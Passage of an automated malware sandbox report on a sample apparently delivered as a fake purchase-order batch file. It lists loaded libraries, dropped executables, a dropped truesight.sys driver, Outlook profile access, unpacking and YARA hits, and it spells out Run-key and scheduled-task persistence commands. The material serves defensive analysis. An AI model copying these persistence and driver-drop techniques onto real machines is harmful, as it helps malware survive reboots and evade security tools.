                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: endpointdlp.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: spp.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: vssapi.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: vsstrace.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppwmi.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: slc.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppcext.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: winscard.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: devobj.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: cryptsp.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: rsaenh.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: cryptbase.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: kernel.appcore.dll
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: uxtheme.dll
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: mscoree.dll
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: wldp.dll
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: amsi.dll
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: userenv.dll
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: profapi.dll
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: version.dll
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: msasn1.dll
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: gpapi.dll
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: cryptsp.dll
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: rsaenh.dll
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: cryptbase.dll
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: windows.storage.dll
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: textshaping.dll
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: textinputframework.dll
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: coreuicomponents.dll
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: coremessaging.dll
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: ntmarta.dll
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: coremessaging.dll
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: wintypes.dll
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: wintypes.dll
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: wintypes.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: version.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: uxtheme.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: url.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ieframe.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: iertutil.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: netapi32.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifAutomated click: OK
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifAutomated click: OK
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                            Source: PO#5_Tower_049.batStatic file information: File size 1243067 > 1048576
                            Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp
                            Source: Binary string: easinvoker.pdb source: x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EDF0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2104269976.000000007F340000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.0000000020676000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000001.2160139244.00000000008E0000.00000040.00000001.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000002.2359070635.00000000008E0000.00000040.00000400.00020000.00000000.sdmp
                            Source: Binary string: _.pdb source: rpkhzpuO.pif, 00000007.00000002.2139671913.0000000027F00000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000002.2130466742.0000000025773000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000002.2137347669.0000000026A85000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000003.2066777727.0000000023BE0000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000003.2220114157.000000001BAEB000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2332577870.000000001D7D3000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2351778016.00000000200D0000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000003.2230537211.000000001BAEB000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000003.2213918135.000000001BAE6000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2319463942.000000001BAEB000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000003.2168298227.000000001BAB2000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2351220430.000000001EB95000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000003.2228595916.000000001BAEB000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000002.2390210005.000000002DE13000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000002.2390829078.000000002F065000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000002.2390995054.0000000030640000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000003.2278096725.000000002C1F3000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: rpkhzpuO.pif, 00000017.00000002.2389107729.000000002C1DA000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EDF0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2104269976.000000007F340000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055747965.00000000216A2000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055747965.00000000216D1000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000003.2156504119.000000000081D000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000003.2156504119.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.0000000020676000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000001.2160139244.00000000008E0000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244287414.0000000000871000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244287414.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000002.2359070635.00000000008E0000.00000040.00000400.00020000.00000000.sdmp

                            Data Obfuscation

                            barindex
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 7.2.rpkhzpuO.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 18.2.rpkhzpuO.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 23.2.rpkhzpuO.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 7.2.rpkhzpuO.pif.400000.2.unpack
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 18.2.rpkhzpuO.pif.400000.2.unpack
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 23.2.rpkhzpuO.pif.400000.2.unpack
                            Source: Yara matchFile source: 7.1.rpkhzpuO.pif.1350008.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.1350008.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.1.rpkhzpuO.pif.1350008.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.1350008.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.x.exe.27c0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.x.exe.22a65a8.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.x.exe.22a65a8.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000004.00000002.2105851599.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2099220238.0000000001220000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000001.2063317653.0000000001220000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.2066610296.00000000022A6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: 7.2.rpkhzpuO.pif.26ac3d90.15.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                            Source: 7.3.rpkhzpuO.pif.23be07b8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                            Source: 7.2.rpkhzpuO.pif.27f00f08.17.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                            Source: 7.2.rpkhzpuO.pif.28640000.18.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                            Source: rpkhzpuO.pif.4.drStatic PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027D87A0 LoadLibraryW,GetProcAddress,FreeLibrary,4_2_027D87A0
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027C32FC push eax; ret 4_2_027C3338
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027EC2FC push 027EC367h; ret 4_2_027EC35F
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027C635C push 027C63B7h; ret 4_2_027C63AF
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027C635A push 027C63B7h; ret 4_2_027C63AF
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027EC0AC push 027EC125h; ret 4_2_027EC11D
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027EC144 push 027EC1ECh; ret 4_2_027EC1E4
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027EC1F8 push 027EC288h; ret 4_2_027EC280
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027D86C0 push 027D8702h; ret 4_2_027D86FA
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027C6740 push 027C6782h; ret 4_2_027C677A
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027C673E push 027C6782h; ret 4_2_027C677A
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027CC4F4 push ecx; mov dword ptr [esp], edx4_2_027CC4F9
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027CD528 push 027CD554h; ret 4_2_027CD54C
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027DE5B4 push ecx; mov dword ptr [esp], edx4_2_027DE5B9
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027CCADF pushfd ; iretd 4_2_027CCB3D
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027CCB74 push 027CCCFAh; ret 4_2_027CCCF2
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027EBB6C push 027EBD94h; ret 4_2_027EBD8C
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027CCB57 push 027CCCFAh; ret 4_2_027CCCF2
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027D68D0 push 027D697Bh; ret 4_2_027D6973
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027D68CE push 027D697Bh; ret 4_2_027D6973
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027CC8A2 push esp; iretd 4_2_027CC8C5
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027D7894 push 027D7911h; ret 4_2_027D7909
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027CC93F push eax; iretd 4_2_027CC975
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027DA920 push 027DA958h; ret 4_2_027DA950
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027DA91F push 027DA958h; ret 4_2_027DA950
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027D8918 push 027D8950h; ret 4_2_027D8948
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027D8916 push 027D8950h; ret 4_2_027D8948
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027D5E04 push ecx; mov dword ptr [esp], edx4_2_027D5E06
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027D2EE8 push 027D2F5Eh; ret 4_2_027D2F56
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027D2FF4 push 027D3041h; ret 4_2_027D3039
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027D2FF3 push 027D3041h; ret 4_2_027D3039
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_0041C40C push cs; iretd 7_2_0041C4E2
                            Source: 7.2.rpkhzpuO.pif.26ac3d90.15.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'DEa0csVGIAPRG', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                            Source: 7.3.rpkhzpuO.pif.23be07b8.0.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'DEa0csVGIAPRG', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                            Source: 7.2.rpkhzpuO.pif.27f00f08.17.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'DEa0csVGIAPRG', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                            Source: 7.2.rpkhzpuO.pif.28640000.18.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'DEa0csVGIAPRG', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

                            Persistence and Installation Behavior

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\Oupzhkpr.PIFJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\rpkhzpuO.pifJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFFile created: C:\Windows \SysWOW64\truesight.sys
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFFile created: C:\Windows \SysWOW64\truesight.sys
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifFile created: C:\Users\user\AppData\Local\Temp\Microsofts.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\Oupzhkpr.PIFJump to dropped file
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifFile created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeJump to dropped file
                            Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\rpkhzpuO.pifJump to dropped file

                            Boot Survival

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 14:45 /du 23:59 /sc daily /ri 1 /f
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OupzhkprJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OupzhkprJump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027DA95C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_027DA95C
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
